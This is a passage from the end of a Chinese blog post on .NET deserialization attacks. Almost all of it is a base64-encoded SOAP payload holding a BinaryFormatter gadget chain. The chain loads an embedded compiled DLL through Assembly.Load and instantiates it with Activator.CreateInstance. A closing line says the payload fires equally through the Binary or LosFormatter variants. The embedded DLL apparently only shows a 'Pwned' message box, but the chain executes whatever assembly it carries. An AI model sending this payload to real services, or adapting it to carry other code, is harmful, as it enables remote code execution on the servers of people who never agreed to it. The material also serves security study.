XQQAAAAJGgAAABAQAAAABwAAAAkEAAAACgklAAAACggIAAAAAAoICAEAAAABEQAAAAsAAAAGJgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGJwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4
wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRASAAAABwAAAAkFAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARMAAAALAAAABikAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2
lnbi5EZXNpZ25lclZlcmIEAAAABioAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAUAAAABQAAAA0CCSsAAAAICAMAAAAJCAAAAAEVAAAACwAAA
AYtAAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABi4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1
NjE5MzRlMDg5EBYAAAABAAAACQYAAAAQFwAAAAIAAAAJBwAAAAkHAAAAEBgAAAACAAAABjEAAAAACTEAAAAEGwAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9
uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24DAAAPU3lzdGVtLkJ5dGVbXVtdCAgJMgAAAAEAAAABAAAABBwAAAAiU3lzdGVtLk
RlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgIAAAAIRGVsZWdhdGUHbWV0aG9kMAMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsa
XphdGlvbkhvbGRlcgkzAAAACTQAAAAEHQAAAIoBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxK0VudW1lcmF0b3JbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwg
UHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAARsaXN0BWluZGV4B3ZlcnNpb24HY3VycmVudAMAAAd/U3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2l
vbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgIAgoAAAAAAAAAAAoBIQAAABwAAAAJNQAAAAk2AAAAASUAAAAcAAAACTcAAAAJOAAAAAErAAAAAwAAAAk5AAAACToAAAAHMg
AAAAEBAAAABAAAAAcCCTsAAAAKCgoEMwAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZ
QptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQY8AAAA1QFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lv
bj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCB
QdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JLgAAAAoJLgAAAAY+AAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5Bj8AAAAETG9hZAoENAAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbk
hvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JPwAAAAkuAAAACT4AAAAGQgAAACdTeXN0Z
W0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkGQwAAAC5TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKFN5c3RlbS5CeXRlW10pCAAAAAoBNQAAADMAAAAGRAAAAMwCU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlJlZmxl
Y3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDF
bW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cm
FsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JLgAAAAoJLgAAAAk+AAAABkcAAAAIR2V0VHlwZXMKATYAAAA0AAAACUcAAAAJLgAAAAk+AAAABkoAAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpBksAAAAYU3lzdGVtL
lR5cGVbXSBHZXRUeXBlcygpCAAAAAoBNwAAADMAAAAGTAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYx
OTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCS4AAAAKCS4AAAAGTgAAABBTeXN0ZW0uQWN0aXZhdG9
yBk8AAAAOQ3JlYXRlSW5zdGFuY2UKATgAAAA0AAAACU8AAAAJLgAAAAlOAAAABlIAAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGUwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS
5UeXBlKQgAAAAKATkAAAALAAAABlQAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACSoAAAAQOgAAAAIAAAAJVgAAAAgIACAAAA87AAAAABIAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMARnHPZQAAAAAAAAAA4AAiIAsBMAAACgAAAAYAAAAA
AAAuKAAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAYAAAAAAAAAAIAAAAACAAAAAAAAAwBghQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA3CcAAE8AAAAAQAAAeAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAKQmAAA
cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAAAAAALnRleHQAAAA0CAAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAeAMAAABAAAAABA
AAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAQAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAABAoAAAAAAAASAAAAAIABQB4IAAALAYAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcgIoDwAACgAAcgEAAHByAQAAcBYfECgQAAAKJioiAHMBAAAGJioAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAPABAAAjfgAAXAIAAJgCAAAjU3RyaW5ncwAAAAD0BAAAEAAA
ACNVUwAEBQAAEAAAACNHVUlEAAAAFAUAABgBAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAAUAAAAAgAAAAIAAAABAAAAEAAAAA4AAAABAAAAAgAAAAAAnAEBAAAAAAAGAPcADwIGAGQBDwIGACsA3QEPAC8CAAAGAFM
AxQEGANoAxQEGALsAxQEGAEsBxQEGABcBxQEGADABxQEGAGoAxQEGAD8A8AEGAB0A8AEGAJ4AxQEGAIUAggEGAHMCqgEKAIwCQwIKAHoCQwIKAFgCQwIKALYBQwIAAAAAAQAAAAAAAQABAAEAEABqAgAAQQABAAEAUCAAAAAAhhjXAQYAAQ
BtIAAAAACWALEBLgABAAAAAQA+AgkA1wEBABEA1wEGABkA1wEKACkA1wEQADEA1wEQADkA1wEQAEEA1wEQAEkA1wEQAFEA1wEQAFkA1wEQAGEA1wEVAGkA1wEQAHEA1wEQAHkA1wEQAIEA1wEGAIkAhwIaAC4ACwA0AC4AEwA9AC4AGwBcA
C4AIwBlAC4AKwB0AC4AMwB0AC4AOwB0AC4AQwBlAC4ASwB6AC4AUwB0AC4AWwB0AC4AYwCSAC4AawC8AC4AcwDJAASAAAABAAAAAAAAAAAAAAAAAAoAAAAEAAAAAAAAAAAAAAAlABQAAAAAAAQAAAAAAAAAAAAAACUAQwIAAAAAAAAAPE1v
ZHVsZT4ARXhwQ2xhc3NhAG1zY29ybGliAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V
0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dH
JpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb
25pbmcARXhwQ2xhc3NhLmRsbABTeXN0ZW0ATWFpbgBNZXNzYWdlQm94SWNvbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1l
LkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAYXJncwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBNZXNzYWdlQm94QnV0dG9ucwBFeHBDbGFzcwBPYmplY3QARGlhbG9nUmVzdWx0AFNob3cATWVzc2FnZUJveAAAAAtQAHcAbgBlAGQ
AAAAAAK00MrKVZahFsxPKH8HhthQABCABAQgDIAABBSABARERBCABAQ4EIAEBAgoABBFJDg4RTRFRCLd6XFYZNOCJBQABAR0OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA4BAAlFeHBDbGFzc2
EAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMjQAACkBACRBQzhERjFBRi03MjBELTRCRTctQUU0MC05MEQzRjU3RDhBQjAAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3b3JrR
GlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIAAAAAAEZxz2UAAAAAAgAAABwBAADAJgAAwAgAAFJTRFMEtmaoGwdvTKnj5k/WPUylAQAAAEU6XENURkxlYXJuaW5nXOW8gOWPkeWtpuS5oFxDc2hhcnBMZWFybmluZ1xFeHBDbGFz
c2FcRXhwQ2xhc3NhXG9ialxEZWJ1Z1xFeHBDbGFzc2EucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCgAAAAAAAAAAAAAHigAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAoAAAAAAAAAAAAAAAAX0Nvck
RsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAI
AAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEA
AAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMA
bwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA8AAoAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARQB4AHAAQwBsAGEAcwBzAGEAAAAwAAgAAQBGAGkAbABlAFYAZQB
yAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA8AA4AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAeABwAEMAbABhAHMAcwBhAC4AZABsAGwAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AH
IAaQBnAGgAdAAgAKkAIAAgADIAMAAyADQAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABFAHgAcABDAGwAYQBzAHMAYQAuAGQAb
ABsAAAANAAKAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABFAHgAcABDAGwAYQBzAHMAYQAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABW
AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAEVgAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL+wCgyQ8m9ws=</SOAP-ENC:Array>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

最终soap的payload如上。换成Binary或者Los都是一样可以触发的。

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#反序列化#.NET